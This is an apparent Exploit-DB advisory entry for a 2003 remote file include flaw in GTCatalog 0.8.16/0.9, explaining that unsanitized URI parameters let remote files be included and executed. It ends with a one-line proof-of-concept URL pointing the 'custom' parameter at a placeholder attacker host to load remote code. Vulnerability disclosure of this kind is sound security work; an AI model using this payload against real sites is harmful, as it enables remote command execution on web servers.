GTCatalog 0.8.16/0.9 - Remote File Include Vulnerability

2003-03-03T00:00:00
ID EDB-ID:22317
Type exploitdb
Reporter frog
Modified 2003-03-03T00:00:00

Description

GTCatalog 0.8.16/0.9 Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6998/info

GTCatalog is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.

This vulnerability is as a result of insufficient sanitization performed on remote user supplied data.

Under some circumstances, it is possible for remote attackers to manipulate URI parameters to include external files on remote servers. If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.target.com/index.php?function=custom&custom=http://www.attacker.com/1.custom.inc